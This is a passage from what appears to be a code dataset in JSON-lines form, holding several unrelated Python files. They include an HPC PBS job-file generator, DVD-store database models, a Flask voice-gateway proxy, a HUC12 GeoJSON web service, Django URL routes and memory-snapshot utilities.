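\n# worked example (illustrative values, not defaults): runtimeNumHours=8 -> walltime \"08:00:00\";\n# nnodes=2, ppn=32, mpi_procs_per_node=16, ompthreads_per_node=2 -> the select directive below becomes\n# \"#PBS -l select=2:ncpus=32:mpiprocs=16:ompthreads=2\" and mpi_procs = 16*2 = 32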
\nmpi_procs = mpi_procs_per_node*nnodes\n\njobfileName = \"%s.pbs\"%(jobfileName)\n#--------- more-or-less fixed code below -----------------\n\nproj_id = 'USNAM37752431'\n\n# open the file\njf = open(jobfileName,'w')\n\n# essential PBS directives\njf.write('#!/bin/bash \\n') # the shell\n#jf.write('#PBS -A %s \\n'%proj_id) # project identifier\njf.write('#PBS -q %s \\n'%queue) # specify queue\njf.write('#PBS -l select=%d:ncpus=%d:mpiprocs=%d:ompthreads=%d \\n'% \\\n (nnodes,ppn,mpi_procs_per_node,ompthreads_per_node))\njf.write('#PBS -l walltime=%s \\n'%walltime)\njf.write('#PBS -l ccm=1 \\n') # specify cluster compatibility mode. Why wouldn't you?\n\n#optional PBS directives\njf.write('#PBS -N %s \\n'%jobName)\njf.write('#PBS -j oe \\n')\n#jf.write('#PBS -V \\n')\njf.write('#PBS -S /bin/bash \\n')\n\n\n# Execution block\njf.write('cd /mnt/lustre/scratch/sblair/jobout \\n')\njf.write(\"JOBID=`echo $PBS_JOBID | cut -d '.' -f 1` \\n\")\njf.write('if [ ! -d $JOBID ]; then \\n')\njf.write(' mkdir -p $JOBID \\n')\n\njf.write('fi \\n')\njf.write('cd $JOBID \\n')\n# copy files \nfor s in filesToCopy:\n jf.write('cp $PBS_O_WORKDIR/%s . \\n'% s)\n\n# invoke execution\njf.write('module swap PrgEnv-cray PrgEnv-gnu\\n') #let's just plan on using GNU for now\n#jf.write('module load costinit\\n')\n#jf.write('module load python\\n')\n#jf.write('module load numpy\\n')\n#jf.write('module load scipy\\n')\n#jf.write('module load mpi4py\\n')\n#jf.write('module load boost\\n')\n#jf.write('module load cray-hdf5\\n')\njf.write('source ~/work/projects/venv/bin/activate \\n');\njf.write('./%s %d %s %d %s %d %d %d\\n'%(run_script,N_divs,\n latticeType,dynamics,partitionType,mpi_procs,ompthreads_per_node,pp_bool))\njf.write('deactivate\\n')\njf.close()\n","sub_path":"genJobfile_grace.py","file_name":"genJobfile_grace.py","file_ext":"py","file_size_in_byte":3438,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"313474624","text":"from database import db\n\nclass Category(db.Model):\n\t__tablename__ = 'categories'\n\n\tcategory = db.Column(db.Integer, primary_key=True, server_default=db.FetchedValue())\n\tcategoryname = db.Column(db.String(50), nullable=False)\n\nt_cust_hist = db.Table(\n\t'cust_hist',\n\tdb.Column('customerid', db.ForeignKey('customers.customerid', ondelete='CASCADE'), nullable=False,index=True),\n\tdb.Column('orderid', db.Integer, nullable=False),\n\tdb.Column('prod_id', db.Integer, nullable=False))\n\n\nclass Customer(db.Model):\n\t__tablename__ = 'customers'\n\n\tcustomerid = db.Column(db.Integer, primary_key=True, server_default=db.FetchedValue())\n\tfirstname = db.Column(db.String(50), nullable=False)\n\tlastname = db.Column(db.String(50), nullable=False)\n\taddress1 = db.Column(db.String(50), nullable=False)\n\taddress2 = db.Column(db.String(50))\n\tcity = db.Column(db.String(50), nullable=False)\n\tstate = db.Column(db.String(50))\n\tzip = db.Column(db.Integer)\n\tcountry = db.Column(db.String(50), nullable=False)\n\tregion = db.Column(db.SmallInteger, nullable=False)\n\temail = db.Column(db.String(50))\n\tphone = db.Column(db.String(50))\n\tcreditcardtype = db.Column(db.Integer, nullable=False)\n\tcreditcard = db.Column(db.String(50), nullable=False)\n\tcreditcardexpiration = db.Column(db.String(50), nullable=False)\n\tusername = db.Column(db.String(50), nullable=False, unique=True)\n\tpassword = db.Column(db.String(50), nullable=False)\n\tage = db.Column(db.SmallInteger)\n\tincome = db.Column(db.Integer)\n\tgender = 
db.Column(db.String(1))\n\tversion_id= db.Column(db.Integer, default=0)\n\tbeingedited = db.Column(db.Boolean, default=False)\n\n\tdef _asdict(self):\n\t\treturn {\n\t\t\t\"id\": self.customerid,\n\t\t\t\"firstname\": self.firstname,\n\t\t\t\"lastname\": self.lastname,\n\t\t\t\"address1\": self.address1,\n\t\t\t\"address2\": self.address2,\n\t\t\t\"city\": self.city,\n\t\t\t\"state\": self.state,\n\t\t\t\"zip\": self.zip,\n\t\t\t\"country\": self.country,\n\t\t\t\"region\": self.region,\n\t\t\t\"email\": self.email,\n\t\t\t\"phone\": self.phone,\n\t\t\t\"creditcardtype\": self.creditcardtype,\n\t\t\t\"creditcard\": self.creditcard,\n\t\t\t\"creditcardexpiration\": self.creditcardexpiration,\n\t\t\t\"username\": self.username,\n\t\t\t\"password\": self.password,\n\t\t\t\"age\": self.age,\n\t\t\t\"income\": self.income,\n\t\t\t\"gender\": self.gender,\n\t\t\t\"version_id\": self.version_id\n\t\t}\n\n\nclass Inventory(db.Model):\n\t__tablename__ = 'inventory'\n\n\tprod_id = db.Column(db.Integer, primary_key=True)\n\tquan_in_stock = db.Column(db.Integer, nullable=False)\n\tsales = db.Column(db.Integer, nullable=False)\n\n\tdef _asdict(self):\n\t\treturn {\n\t\t\t\"prod_id\": self.prod_id,\n\t\t\t\"quan_in_stock\": self.quan_in_stock,\n\t\t\t\"sales\": self.sales\n\t\t}\n\n\nt_orderlines = db.Table(\n\t'orderlines',\n\tdb.Column('orderlineid', db.Integer, nullable=False),\n\tdb.Column('orderid', db.ForeignKey('orders.orderid', ondelete='CASCADE'), nullable=False),\n\tdb.Column('prod_id', db.ForeignKey('products.prod_id'), nullable=False),\n\tdb.Column('quantity', db.SmallInteger, nullable=False),\n\tdb.Column('orderdate', db.Date, nullable=False),\n\tdb.Index('ix_orderlines_orderid', 'orderid', 'orderlineid'))\n\n\nclass Order(db.Model):\n\t__tablename__ = 'orders'\n\n\torderid = db.Column(db.Integer, primary_key=True, server_default=db.FetchedValue())\n\torderdate = db.Column(db.Date, nullable=False)\n\tcustomerid = db.Column(db.ForeignKey('customers.customerid', ondelete='SET NULL'), index=True)\n\tnetamount = db.Column(db.Numeric(12, 2), nullable=False)\n\ttax = db.Column(db.Numeric(12, 2), nullable=False)\n\ttotalamount = db.Column(db.Numeric(12, 2), nullable=False)\n\n\tcustomer = db.relationship('Customer', primaryjoin='Order.customerid == Customer.customerid', backref='orders')\n\titems = db.relationship('Product', secondary=t_orderlines, backref=\"orderid\")\n\n\tdef _asdict(self):\n\t\treturn {\n\t\t\t\"orderid\": self.orderid,\n\t\t\t\"orderdate\": self.orderdate,\n\t\t\t\"customerid\": self.customerid,\n\t\t\t\"netamount\": self.netamount,\n\t\t\t\"tax\": self.tax,\n\t\t\t\"totalamount\": self.totalamount,\n\t\t\t\"items\": self.items\n\t\t}\n\n\nclass Product(db.Model):\n\t__tablename__ = 'products'\n\n\tprod_id = db.Column(db.Integer, primary_key=True, server_default=db.FetchedValue())\n\tcategory = db.Column(db.Integer, nullable=False, index=True)\n\ttitle = db.Column(db.String(50), nullable=False)\n\tactor = db.Column(db.String(50), nullable=False)\n\tprice = db.Column(db.Numeric(12, 2), nullable=False)\n\tspecial = db.Column(db.SmallInteger, index=True)\n\tcommon_prod_id = db.Column(db.Integer, nullable=False)\n\n\tdef _asdict(self):\n\t\treturn {\n\t\t\t\"prod_id\": self.prod_id,\n\t\t\t\"category\": self.category,\n\t\t\t\"title\": self.title,\n\t\t\t\"actor\": self.actor,\n\t\t\t\"price\": self.price,\n\t\t\t\"special\": self.special,\n\t\t\t\"common_prod_id\": self.common_prod_id\n\t\t}\n\n\nt_reorder = db.Table(\n\t'reorder',\n\tdb.Column('prod_id', db.Integer, 
nullable=False),\n\tdb.Column('date_low', db.Date, nullable=False),\n\tdb.Column('quan_low', db.Integer, nullable=False),\n\tdb.Column('date_reordered', db.Date),\n\tdb.Column('quan_reordered', db.Integer),\n\tdb.Column('date_expected', db.Date))\n","sub_path":"FLASK/DVD/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":4907,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"14394588","text":"# ------------------------------------------------\n# IMPORTS ----------------------------------------\n# ------------------------------------------------\n#####\n# Python dist and 3rd party libraries\n#####\nimport os, requests, json, string, datetime, logging, time\n\nfrom os.path import join, dirname\nfrom flask import Flask, request, render_template, redirect, url_for, Response\nfrom voicefilters import response_filter, check_utterance, need_connexusID, check_ssml_number, cleanResponseForGateway\nfrom weblogger import addLogEntry\nfrom fromGatewayFilter import inputFilters\nfrom checkGatewaySignal import signals\nfrom checkClientWaitState import waitState\nfrom checkDTMF import dtmf\nfrom checkUtterance import utterance\nfrom callSystemOfRecordBeforeConversation import callSORBeforeConv\nfrom callConversation import callConversationService\nfrom checkPollingBackend import pollBackend\nfrom callSystemOfRecordAfterConversation import callSORAfterConv\nfrom checkConversationSignal import wcsSignals\nfrom toGatewayFilter import outputFilter\nimport voiceProxyUtilities\nimport voiceProxySettings\n\nvoiceProxySettings.init()\n\n\n# ------------------------------------------------\n# FLASK ------------------------------------------\n# ------------------------------------------------\napp = Flask(__name__)\n\n\nlogging.basicConfig(level=logging.INFO, format='%(asctime)s - %(levelname)s - %(message)s')\n\nlogging_comp_name = \"Voice Proxy Main Loop\"\n\n@app.route('/docs/CognitiveIntegrationServiceServer')\ndef documentPage():\n return app.send_static_file('docs/CognitiveIntegrationServiceServer.html')\n\n\n@app.route('/docs/images/image00.png')\ndef documentImage():\n return app.send_static_file('docs/images/image00.png')\n \t\n# ------------- Main loop for CIS ----------------\n\n@app.route('/v1/workspaces//', methods=['POST'])\ndef restVoiceGatewayEntry(spaceid,msg):\t\n\tresp_data = voiceGatewayEntry(spaceid,msg)\n\treturn Response(resp_data, mimetype='application/json',status=200)\n\t\ndef voiceGatewayEntry(spaceid,msg):\n\t#Get data from post -- should be in the form of a conversation message\t\n\tmessage = json.loads(request.data)\n\n\t##### First Check to see if the message passed to the Server is valid format #######\n\tif not checkGatewayMessage(message):\n\t\t# Need to know how to signal the Gateway something is wrong\n\t\tmessage = returningEarlyCleanup(message,'Gateway Message Check Failed -> Returning to Gateway')\n\t\treturn json.dumps(message, separators=(',',':'))\n\n\taddLogEntry(voiceProxySettings.APP_NAME_LOGGING, logging_comp_name, 'New API Call', message)\n\tmessage = inputFilters(message)\n\tif earlyReturn(message):\n\t\tmessage = returningEarlyCleanup(message,'inputFilters -> Returning to Gateway')\n\t\treturn json.dumps(message, separators=(',',':'))\n\n\tmessage = signals(message)\n\tif earlyReturn(message):\n\t\tmessage = returningEarlyCleanup(message,'signals -> Returning to Gateway')\n\t\treturn json.dumps(message, separators=(',',':'))\n\t\n\tmessage = waitState(message)\n\tif 
earlyReturn(message):\n\t\tmessage = returningEarlyCleanup(message,'waitState -> Returning to Gateway')\n\t\treturn json.dumps(message, separators=(',',':'))\n\t\n\tmessage = dtmf(message)\n\tif earlyReturn(message):\n\t\tmessage = returningEarlyCleanup(message,'dtmf -> Returning to Gateway')\n\t\treturn json.dumps(message, separators=(',',':'))\n\t\n\tmessage = utterance(message)\n\tif earlyReturn(message):\n\t\tmessage = returningEarlyCleanup(message,'utterance -> Returning to Gateway')\n\t\treturn json.dumps(message, separators=(',',':'))\n\t\t\n\tmessage = pollBackend(message)\n\tif earlyReturn(message):\n\t\tmessage = returningEarlyCleanup(message,'pollbackend -> Returning to Gateway')\n\t\treturn json.dumps(message, separators=(',',':'))\n\t\t\n\tmessage = callSORBeforeConv(message)\n\tif earlyReturn(message):\n\t\tmessage = returningEarlyCleanup(message,'callBackend1 -> Returning to Gateway')\n\t\treturn json.dumps(message, separators=(',',':'))\n\t\t\n\tmessage = callConversationService(message)\n\tif earlyReturn(message):\n\t\tmessage = returningEarlyCleanup(message,'callConversation -> Returning to Gateway')\n\t\treturn json.dumps(message, separators=(',',':'))\n\t\n\tmessage = wcsSignals(message)\n\tif earlyReturn(message):\n\t\tmessage = returningEarlyCleanup(message,'callWcsSignal -> Returning to Gateway')\n\t\treturn json.dumps(message, separators=(',',':'))\n\t\n\t\n\tmessage = callSORAfterConv(message)\n\tif earlyReturn(message):\n\t\tmessage = returningEarlyCleanup(message,'callBackend2 -> Returning to Gateway')\n\t\treturn json.dumps(message, separators=(',',':'))\n\t\n\tmessage = outputFilter(message)\n\tif earlyReturn(message):\n\t\tmessage = returningEarlyCleanup(message,'outputFilters -> Returning to Gateway')\n\t\treturn json.dumps(message, separators=(',',':'))\n\t\n\t\n\t# Finally Returning to Gateway\n\taddLogEntry(voiceProxySettings.APP_NAME_LOGGING, logging_comp_name, 'Normal Return to Gateway', message)\n\treturn json.dumps(message, separators=(',',':'))\n\t\n\n\n\n#-------------- Gateway Utility Methods ----------------------\n# First method calldd \ndef checkGatewayMessage(message):\n\treturn True\n\n\ndef earlyReturn(message):\n\treturn voiceProxyUtilities.earlyReturn(message)\n\t\ndef returningEarlyCleanup(message, logmessage):\n\tearlyMsg = voiceProxyUtilities.getCisAttribute('earlyReturnMsg',message)\n\tif earlyMsg and len(earlyMsg)>0:\n\t\taddLogEntry(voiceProxySettings.APP_NAME_LOGGING, logging_comp_name, earlyMsg, message)\n\t\tmessage = voiceProxyUtilities.clearCisAttribute('earlyReturn',message)\n\t\tmessage = voiceProxyUtilities.clearCisAttribute('earlyReturnMsg',message)\n\telse:\n\t\taddLogEntry(voiceProxySettings.APP_NAME_LOGGING, logging_comp_name, logmessage, message)\n\t\tmessage = voiceProxyUtilities.clearCisAttribute('earlyReturn',message)\n\t\tmessage = voiceProxyUtilities.clearCisAttribute('earlyReturnMsg',message)\t\n\t\n\tmessage = outputFilter(message)\n\t\n\treturn message\n\n#-------------- End Gateway Utility Methods ------------------\n\n\n\n#-------------- API Methods ----------------------------------\n@app.route('/cis/bargein', methods=['POST','GET', 'PUT'])\ndef apiBargin():\n\tif request.data:\n\t\tdata = json.loads(request.data)\n\t\tstate = voiceProxySettings.generateState();\n\t\n\t\n\t\tif request.method == 'POST':\n\t\t\tif 'cisBargein' in data['cisContext']:\n\t\t\t\tvoiceProxySettings.BARGE_IN_ENABLED = data['cisContext']['cisBargein']\n\t\t\n\t\tif request.method == 'PUT':\n\t\t\tif 'cisBargein' in 
data['cisContext']:\n\t\t\t\tvoiceProxySettings.BARGE_IN_ENABLED = data['cisContext']['cisBargein']\n\t\t\t\n\tif request.method == 'GET':\n\t\tstate = voiceProxySettings.generateState();\n\t\n\tstate = voiceProxySettings.generateState();\n\t\n\t\n\tresp_data = json.dumps(state, separators=(',',':'))\n\treturn Response(resp_data, mimetype='application/json',status=200)\n\n@app.route('/cis/weblogging', methods=['POST','GET', 'PUT'])\ndef apiWeblogging():\n\tif request.data:\n\t\tdata = json.loads(request.data)\n\t\tstate = voiceProxySettings.generateState();\n\t\n\t\n\t\tif request.method == 'POST':\n\t\t\tif 'cisWebLogging' in data['cisContext']:\n\t\t\t\tvoiceProxySettings.WEB_LOGGING = data['cisContext']['cisWebLogging']\n\t\t\n\t\tif request.method == 'PUT':\n\t\t\tif 'cisWebLogging' in data['cisContext']:\n\t\t\t\tvoiceProxySettings.WEB_LOGGING = data['cisContext']['cisWebLogging']\n\t\t\t\n\tif request.method == 'GET':\n\t\tstate = voiceProxySettings.generateState();\n\t\n\tstate = voiceProxySettings.generateState();\n\t\n\t\n\tresp_data = json.dumps(state, separators=(',',':'))\n\treturn Response(resp_data, mimetype='application/json',status=200)\n\n@app.route('/cis/customerWait', methods=['POST','GET', 'PUT'])\ndef apiCustomerWait():\n\tif request.data:\n\t\tdata = json.loads(request.data)\n\t\tstate = voiceProxySettings.generateState();\n\t\n\t\n\t\tif request.method == 'POST':\n\t\t\tif 'cisCustomerWait' in data['cisContext']:\n\t\t\t\tvoiceProxySettings.ALLOW_CUSTOMER_SET_WAIT = data['cisContext']['cisCustomerWait']\n\t\t\n\t\tif request.method == 'PUT':\n\t\t\tif 'cisCustomerWait' in data['cisContext']:\n\t\t\t\tvoiceProxySettings.ALLOW_CUSTOMER_SET_WAIT = data['cisContext']['cisCustomerWait']\n\t\t\t\n\tif request.method == 'GET':\n\t\tstate = voiceProxySettings.generateState();\n\t\n\tstate = voiceProxySettings.generateState();\n\t\n\t\n\tresp_data = json.dumps(state, separators=(',',':'))\n\treturn Response(resp_data, mimetype='application/json',status=200)\n\n@app.route('/cis/dtmf', methods=['POST','GET', 'PUT'])\ndef apidtmf():\n\tif request.data:\n\t\tdata = json.loads(request.data)\n\t\tstate = voiceProxySettings.generateState();\n\t\n\t\n\t\tif request.method == 'POST':\n\t\t\tif 'cisDTMF' in data['cisContext']:\n\t\t\t\tif 'enabled' in data['cisContext']['cisDTMF']:\n\t\t\t\t\tvoiceProxySettings.DTMF_ENABLED = data['cisContext']['cisDTMF']['enabled']\n\t\t\t\n\t\tif request.method == 'PUT':\n\t\t\tif 'cisDTMF' in data['cisContext']:\n\t\t\t\tif 'enabled' in data['cisContext']['cisDTMF']:\n\t\t\t\t\tvoiceProxySettings.DTMF_ENABLED = data['cisContext']['cisDTMF']['enabled']\n\t\t\t\n\tif request.method == 'GET':\n\t\tstate = voiceProxySettings.generateState();\n\t\n\tstate = voiceProxySettings.generateState();\n\t\n\t\n\tresp_data = json.dumps(state, separators=(',',':'))\n\treturn Response(resp_data, mimetype='application/json',status=200)\n\n\n@app.route('/cis/polling', methods=['POST','GET', 'PUT'])\ndef apiPolling():\n\tif request.data:\n\t\tdata = json.loads(request.data)\n\t\tstate = voiceProxySettings.generateState();\n\t\n\t\n\t\tif request.method == 'POST':\n\t\t\tif 'cisPolling' in data['cisContext']:\n\t\t\t\tif 'sleepTime' in data['cisContext']['cisPolling']:\n\t\t\t\t\tvoiceProxySettings.POLLING_SLEEP_TIME = data['cisContext']['cisPolling']['sleepTime']\n\t\t\t\tif 'URL' in data['cisContext']['cisPolling']:\n\t\t\t\t\tvoiceProxySettings.POLLING_URL = data['cisContext']['cisPolling']['URL']\n\t\t\t\tif 'username' in 
data['cisContext']['cisPolling']:\n\t\t\t\t\tvoiceProxySettings.POLLING_USERNAME = data['cisContext']['cisPolling']['username']\n\t\t\t\tif 'password' in data['cisContext']['cisPolling']:\n\t\t\t\t\tvoiceProxySettings.POLLING_PASSWORD = data['cisContext']['cisPolling']['password']\n\t\t\n\t\t\n\t\tif request.method == 'PUT':\n\t\t\tif 'cisPolling' in data['cisContext']:\n\t\t\t\tif 'sleepTime' in data['cisContext']['cisPolling']:\n\t\t\t\t\tvoiceProxySettings.POLLING_SLEEP_TIME = data['cisContext']['cisPolling']['sleepTime']\n\t\t\t\tif 'URL' in data['cisContext']['cisPolling']:\n\t\t\t\t\tvoiceProxySettings.POLLING_URL = data['cisContext']['cisPolling']['URL']\n\t\t\t\tif 'username' in data['cisContext']['cisPolling']:\n\t\t\t\t\tvoiceProxySettings.POLLING_USERNAME = data['cisContext']['cisPolling']['username']\n\t\t\t\tif 'password' in data['cisContext']['cisPolling']:\n\t\t\t\t\tvoiceProxySettings.POLLING_PASSWORD = data['cisContext']['cisPolling']['password']\n\t\t\t\n\tif request.method == 'GET':\n\t\tstate = voiceProxySettings.generateState();\n\t\n\tstate = voiceProxySettings.generateState();\n\t\n\t\n\tresp_data = json.dumps(state, separators=(',',':'))\n\treturn Response(resp_data, mimetype='application/json',status=200)\n\n\n#-------------- End API Methods ------------------------------\n\n\n\n\n\n\n\nport = os.getenv('PORT', '5000')\nif __name__ == \"__main__\":\n\tapp.run(host='0.0.0.0', port=int(port))","sub_path":"jj-voice-gateway/sample.voice.gateway/soe/python/voiceProxyServer.py","file_name":"voiceProxyServer.py","file_ext":"py","file_size_in_byte":10862,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"173354630","text":"#!/usr/bin/env python\n\"\"\"GeoJSON service for HUC12 data\"\"\"\nimport json\nimport cgi\nimport datetime\n\nimport memcache\nfrom pyiem.dep import RAMPS\nfrom pyiem.util import get_dbconn, ssw\n\n\ndef do(ts, ts2, domain):\n \"\"\"Do work\"\"\"\n pgconn = get_dbconn('idep')\n cursor = pgconn.cursor()\n utcnow = datetime.datetime.utcnow()\n dextra = \"valid = %s\"\n args = (ts,)\n if ts2 is not None:\n dextra = \"valid >= %s and valid <= %s\"\n args = (ts, ts2)\n domainextra = ''\n if domain is not None:\n domainextra = \" and states ~* '%s'\" % (domain[:2].upper(),)\n cursor.execute(\"\"\"WITH data as (\n SELECT ST_asGeoJson(ST_Transform(simple_geom, 4326), 4) as g,\n huc_12\n from huc12 WHERE scenario = 0 \"\"\" + domainextra + \"\"\"), obs as (\n SELECT huc_12,\n sum(coalesce(avg_loss, 0)) * 4.463 as avg_loss,\n sum(coalesce(avg_delivery, 0)) * 4.463 as avg_delivery,\n sum(coalesce(qc_precip, 0)) / 25.4 as qc_precip,\n sum(coalesce(avg_runoff, 0)) / 25.4 as avg_runoff\n from results_by_huc12 WHERE\n \"\"\"+dextra+\"\"\" and scenario = 0 GROUP by huc_12)\n\n SELECT d.g, d.huc_12,\n coalesce(o.avg_loss, 0),\n coalesce(o.qc_precip, 0),\n coalesce(o.avg_delivery, 0),\n coalesce(o.avg_runoff, 0)\n from data d LEFT JOIN obs o ON (d.huc_12 = o.huc_12)\n \"\"\", args)\n res = {'type': 'FeatureCollection',\n 'date': ts.strftime(\"%Y-%m-%d\"),\n 'date2': None if ts2 is None else ts2.strftime(\"%Y-%m-%d\"),\n 'features': [],\n 'generation_time': utcnow.strftime(\"%Y-%m-%dT%H:%M:%SZ\"),\n 'count': cursor.rowcount}\n avg_loss = []\n qc_precip = []\n avg_delivery = []\n avg_runoff = []\n for row in cursor:\n avg_loss.append(row[2])\n qc_precip.append(row[3])\n avg_delivery.append(row[4])\n avg_runoff.append(row[5])\n res['features'].append(dict(type=\"Feature\",\n id=row[1],\n properties=dict(\n 
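# per-HUC12 totals for the requested period, unit-converted in the SQL above (loss/delivery *4.463, precip/runoff /25.4)\n                                        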
avg_loss=row[2],\n qc_precip=row[3],\n avg_delivery=row[4],\n avg_runoff=row[5]),\n geometry=json.loads(row[0])\n ))\n myramp = RAMPS['english'][0]\n if ts2 is not None:\n days = (ts2 - ts).days\n myramp = RAMPS['english'][1]\n if days > 31:\n myramp = RAMPS['english'][2]\n\n res['jenks'] = dict(avg_loss=myramp,\n qc_precip=myramp,\n avg_delivery=myramp,\n avg_runoff=myramp)\n return json.dumps(res)\n\n\ndef main():\n \"\"\"Do Fun things\"\"\"\n ssw(\"Content-Type: application/vnd.geo+json\\n\\n\")\n form = cgi.FieldStorage()\n cb = form.getfirst('callback', None)\n domain = form.getfirst('domain', None)\n ts = datetime.datetime.strptime(form.getfirst('date', '2015-05-05'),\n '%Y-%m-%d')\n ts2 = None\n if form.getfirst('date2', None) is not None:\n ts2 = datetime.datetime.strptime(form.getfirst('date2'), '%Y-%m-%d')\n\n mckey = (\"/geojson/huc12/%s/%s/%s\"\n ) % (ts.strftime(\"%Y%m%d\"),\n '' if ts2 is None else ts2.strftime(\"%Y%m%d\"),\n '' if domain is None else domain)\n mc = memcache.Client(['iem-memcached:11211'], debug=0)\n res = mc.get(mckey)\n if not res:\n res = do(ts, ts2, domain)\n mc.set(mckey, res, 3600)\n\n if cb is None:\n ssw(res)\n else:\n ssw(\"%s(%s)\" % (cb, res))\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"htdocs/geojson/huc12.py","file_name":"huc12.py","file_ext":"py","file_size_in_byte":3746,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"103902637","text":"# basic example of getting the HTML from a website that is rendered on the client-side by javascript \n# with the function ReturnHTML(url) from the scrape.py script\n# the raw data obtained is saved in a .txt file\n\nimport scrape\n\ndef main():\n url = input(\"Write the url inside parenthises. url=\")\n # url should be inside parenthises\n if (url[0] == '\"') & (url[len(url)-1] == '\"'):\n print(\"going to\")\n # calling the function ReturnHTML from the scrape.py script\n rawHTML = scrape.ReturnHTML(url)\n # save raw HTML to .txt file\n saveTxt(\"raw-html.txt\",rawHTML) \n else:\n print(\"something's missing\")\n url = input(\"Write the url inside parenthises. url=\")\n\ndef saveTxt(path,data):\n print(\"going to save the data into a .txt\")\n file = open(path,\"w\") \n file.write(str(data)) \n print(str(len(data))+\" characters saved. *bye*\")\n file.close() \n\nif __name__ == \"__main__\":\n main()\n\n","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":950,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"508182986","text":"\"\"\"xgjz URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/1.9/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.conf.urls import url, include\n 2. 
Add a URL to urlpatterns:  url(r'^blog/', include('blog.urls'))\n\"\"\"\nfrom django.conf.urls import url, patterns, include\nfrom django.contrib import admin\nfrom users.views import home,UserLogin, UserRegister, UserPage, RedirectToUserpage, UserLogout, Exam, Avatar\nfrom biaoqingbao.views import biaoqinglist, allbiaoqinglist\nfrom weibo.views import Weibo\nfrom zssp.views import allArticle, oneArticle\nfrom txfs.views import allVideo, oneVideo\nimport os\n\nBASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\nurlpatterns = [\n    #url(r'^admin/', admin.site.urls),\n    url(r'^$', home),\n    url(r'^login/$', UserLogin),\n    url(r'^register/$', UserRegister),\n    #url(r'^findPassword/$', FindPassword),\n    url(r'^(\\d+)/$', UserPage),\n    url(r'^(\\d+)/avatar/$', Avatar),\n    #url(r'^(\\d+)/changePassword/$', ChangePassword),\n    #url(r'^(\\d+)/relationList/$', RelationList),\n    url(r'^uploadbiaoqing/$', RedirectToUserpage),\n    url(r'^(\\d+)/exam/$', Exam),\n    url(r'^loggedout/$', UserLogout),\n    url(r'^(\\d+)/biaoqingbao/$', biaoqinglist),\n    url(r'^allbiaoqing/$', allbiaoqinglist),\n    url(r'^tanxiaofengsheng/$', allVideo),\n    url(r'^tanxiaofengsheng/video(\\d+)/$', oneVideo),\n    url(r'^weibo/$', Weibo),\n    #url(r'^weibo/(\\d+)/album/$', Album),\n    url(r'^zishishuiping/$', allArticle),\n    url(r'^zishishuiping/article(\\d+)/$', oneArticle),\n    url(r'^media/(?P<path>.*)', 'django.views.static.serve', {'document_root': os.path.join(BASE_DIR, 'media/')}),\n]","sub_path":"xgjz/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2053,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"6359313","text":"import tracemalloc\nimport json\nimport time\nimport logging\nimport os\nimport functools\nlog = logging.getLogger(__name__)\n\n\ndef _nested_tuple_from_nested_list(nl):\n    if isinstance(nl, list):\n        tuple_base = (_nested_tuple_from_nested_list(nested) for nested in nl)\n        return tuple(tuple_base)\n    return nl\n\n\nclass TracemallocJsonEncoder(json.JSONEncoder):\n    def default(self, o):\n        if isinstance(o, tracemalloc.Snapshot):\n            return o.__dict__\n        elif isinstance(o, tracemalloc._Traces):\n            return list(o)\n        elif isinstance(o, tracemalloc.Trace):\n            return o._trace\n        return super().default(o)\n\n\nclass TracemallocJsonDecoder(json.JSONDecoder):\n    \"\"\"\n    Deserializes tracemalloc.Snapshot instances created with TracemallocJsonEncoder\n    use with json.load/loads - pass class (not instance) in cls argument\n    \"\"\"\n    def decode(self, s):\n        raw = super().decode(s)\n        return tracemalloc.Snapshot(\n            traces=[_nested_tuple_from_nested_list(_t) for _t in raw['traces']],\n            traceback_limit=raw['traceback_limit']\n        )\n\n\nclass TracemallocWorker:\n    def __init__(self):\n        pass\n\n    def set_tracking(self, tracemalloc_depth):\n        if tracemalloc_depth > 0 and tracemalloc.is_tracing() and tracemalloc_depth != tracemalloc.get_traceback_limit():\n            tracemalloc.stop()\n            tracemalloc.start(tracemalloc_depth)\n            pass\n\n        if tracemalloc_depth > 0 and tracemalloc.is_tracing() == False:\n            tracemalloc.start(tracemalloc_depth)\n\n        if tracemalloc_depth == 0:\n            tracemalloc.stop()\n\n    def take_snapshot(self):\n        if tracemalloc.is_tracing():\n            return tracemalloc.take_snapshot()\n\n    def write_snapshot(self, snapshot, dump_filename):\n        try:\n            with open(dump_filename, mode='w') as f:\n                json.dump(snapshot, f, cls=TracemallocJsonEncoder)\n        except:\n            log.info(\"Unable to write tracemalloc json dump path: %s\", dump_filename, exc_info=1)\n\n\nclass TracemallocDriver:\n    def __init__(self, 
external_api):\n self.external_api = external_api\n self.snapshot_storage_path = self.external_api.get_log_path()\n log.info(\"Memory snapshot storage_path %s\", self.snapshot_storage_path)\n self.worker = TracemallocWorker()\n\n def process_memory_usage(self):\n try:\n tracemalloc_depth = self.external_api.get_int_debug_flag(\"debugPluginAgentTracemallocDepthNative\", 0)\n tracemalloc_dumps = self.external_api.get_bool_debug_flag(\"debugPluginAgentTracemallocDumpsNative\", False)\n self.worker.set_tracking(tracemalloc_depth)\n\n if tracemalloc_depth > 0 and tracemalloc_dumps:\n log.info(\"Started taking memory snapshot\")\n snapshot = self.worker.take_snapshot()\n if tracemalloc_dumps:\n self.worker.write_snapshot(\n snapshot,\n dump_filename=self._snapshot_filename()\n )\n log.info(\"Finished taking memory snapshot\")\n except:\n log.info(\"Processing memory usage failed with exception\", exc_info=1)\n\n def _snapshot_filename(self):\n pid = os.getpid()\n timestamp = str(time.monotonic()).replace('.', 